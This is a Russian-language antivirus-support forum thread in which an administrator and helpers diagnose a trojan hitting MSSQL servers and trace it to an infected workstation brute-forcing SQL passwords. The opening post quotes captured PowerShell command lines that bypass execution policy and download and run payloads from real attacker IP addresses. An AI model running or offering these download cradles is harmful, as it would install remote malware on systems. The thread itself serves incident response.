Перейти к содержанию

Trojan:Win32/HijackSQLServer.AB and Trojan:XML/SuspBuild.MJ!ibt and ISB.Downloader!gen173


Xxandr

Рекомендуемые сообщения

Доброго дня!

 

Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER.

В случае Win 2008 и с антивирусом Symantec (ISB.Downloader!gen173) также фиксируются и ликвидируются эти угрозы (скриншот 3), однако уже от пользователя NETWORK SERVICE.

 

В предыдущий раз когда эта проблема была на 2012 винде без антивируса, то эффект был в виде заполнения озу множественными процессами powershell с параметрами типа

 

CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png
CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png

 

Пожалуйста, помогите побороть эту беду.

mstsc_mx9pDrZu0I.png

mstsc_qvpW6ThmX2.png

gtXgUAbtoS.png

Ссылка на комментарий
Поделиться на другие сайты

Дополнительно, пожалуйста:

 

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на комментарий
Поделиться на другие сайты

Разрешения на эти порты задавали самостоятельно?

Цитата

FirewallRules: [{ACDD6BAE-354C-4C3A-A625-07BF69EA9595}] => (Allow) LPort=1303
FirewallRules: [{6D9143FF-6E7F-4AE7-815F-886CE4C1BBEC}] => (Allow) LPort=3381
FirewallRules: [{58CFFC2A-D66F-4D54-B494-1E56BA28AEC3}] => (Allow) LPort=475
FirewallRules: [{04F6DEBB-AF2C-4E9B-9056-F5AD7F131722}] => (Allow) LPort=475


 

Ссылка на комментарий
Поделиться на другие сайты

25 минут назад, Sandor сказал:

Разрешения на эти порты задавали самостоятельно?


 

да. все были сделаны принудительно. Но сейчас вижу что часть из них уже неактуальна, например 475 - правило для этого порта закрываю. А для остальных я сделаю более детальное правила: добавлю приложения, которые эксплуатируют эти порты.

Ссылка на комментарий
Поделиться на другие сайты

ещё одно наблюдение. Я посмотрел время и дни в журналах  Symantec. И оказывается что:

- первая угроза происходит в начале рабочего дня - с 7 до 8 утра. А последняя в конце рабочего дня. Но некоторые сотрудники у нас заканчивают работу по разному: с 15:00 и до 17:00 крайняя ликвидированная угроза за день.

- атаки не происходят на выходных, когда в офисе на 99% нет ПК-юзеров

 

Завтра проведу эксперимент с поочерёдным включением наиболее подозрительных станций.

Изменено пользователем Xxandr
Ссылка на комментарий
Поделиться на другие сайты

Ещё.

Решил поизучать журнал SQL сервера. Оказалось, что в тоже самое время (+/- 1 минута) в журнале зафиксированы неудачные попытки подключения к серверу с одного из ПК, который уже изолирован от сети.

Неудача заключается в неправильном пароле. Однако, скорее всего работает перебор паролей, где вирусное ПО всё же подбирает актуальный пароль и осуществляет атаку.

Ссылка на комментарий
Поделиться на другие сайты

1 минуту назад, Xxandr сказал:

одного из ПК

Если в сети нет централизованного управления защитой, пройдитесь на каждом ПК хотя бы KVRT.

  • Like (+1) 1
Ссылка на комментарий
Поделиться на другие сайты

Итак, как и ожидалось, виновник - клиент (ПК) из журнала MSSQL. Причём, это самый обычный ПК юзера для RDP-сеансов,  Windows 7. После его отключения от сети атаки прекратились.

Запустил на нём KVRT.

Найдена вот такая беда - скриншот 1. В карантин не копируется, видимо из-за занятости его системой. Сам файл отсутствует по такому пути C:\Windows\System32\MsB9AB2A36App.dll даже при активации скрытых элементов. Хотя, при повторной проверке KVRT он там находится, судя по отчёту. А ещё KMS драйвер был замечен, и тоже в SYSTEM32. 

Файлы отчёта прикрепляю.

 

Find.jpg

reports.zip

Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте,

HiJackThis (из каталога autologger) профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.


O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block

 

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

Могли бы также проверить пожалуйста, если в вашей базе-данных не появились странные пользователи или задачи?
 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • aronone
      От aronone
      Здравствуйте, защитник виндовс нашел Trojan:Win32/Dorv.A , и еще PUABundler:Win32/uTorrent_BundleInstaller и PUADlManager:Win32/OfferCore , поместил в карантин и заблокировал, после проверил куррейтом и ничего не находит. Просьба помочь почистить пк. Вирус появился сразу после подключения к общему гостиничному вай фай, может быть это как то связанно
      cureit.zip CollectionLog-2024.11.30-15.34.zip
    • T23
      От T23
      Пж помогите решить проблему.

    • ksp_user
      От ksp_user
      Two months ago, suddenly, my Windows 11 PC refused me login. I tried several methods and everything failed and lead to fully format the PC. 
       
      Usually, I keep a copy of my notes in Google Drive so I did not worry much. 
       
      But I have noticed that my Google Drive also infected by a ransomware almost all the files there, renamed them to <filename>.<file extention>.id[bMtMPqp].stop and encrypted. 
       
      Since I couldn't log in to my PC , most probably ransomware encrypted the system files, I did not see any ransom notes or anything.
       
      Is it possible to identify the ransomware and decrypt the files in the Google Drive?
       
      Thanks.  
    • МихаилЕ
      От МихаилЕ
      Добрый день!
      После установки KSWS на windows-серверы заметили рост объема ежедневных инкрементных бэкапов, которые делаются с помощью Veeam, в среднем на ~2-4Гб. 
      До KSWS использовался ESET и подобных проблем не было.
      Есть предположение, что изменения вызваны ежедневным обновлением антивирусной базы (каждые 12 ч). Размер C:\ProgramData\Kaspersky Lab в среднем 1,7 Гб. и учитывая, что обновление может успеть произойти дважды до ночного архивирования, сумма прироста подтверждается.
      Обычный объем архивируемых данных был 200-500 Мб.
      Возможно ли уменьшить объем изменяемых KSWS блоков данных на диске, чтобы уменьшить размер архивов?
      Возможно ли перенести размещение баз и temp из C:\ProgramData\Kaspersky Lab в другую папку?
    • ZloyM
      От ZloyM
      Утром при входе обнаружилось, что файлы зашифрованы, имеется письмо с требованием денег.
      В журнале угроз Ransom:Win32/Sorikrypt и Trojan:Win32/Wacatac.H!ml - запушены утром пользователями, которые точно не могли это сделать.
      От интернета отключил. Если не отключать, то примерно раз в 10 минут пользователя выкидывает и при этом с флешки удаляются все файлы и на нее помещается копия письма с требованием денег.
      CureIt и KVRT нашли только RDPWrap.
      CollectionLog-2023.10.27-13.29.zip
×
×
  • Создать...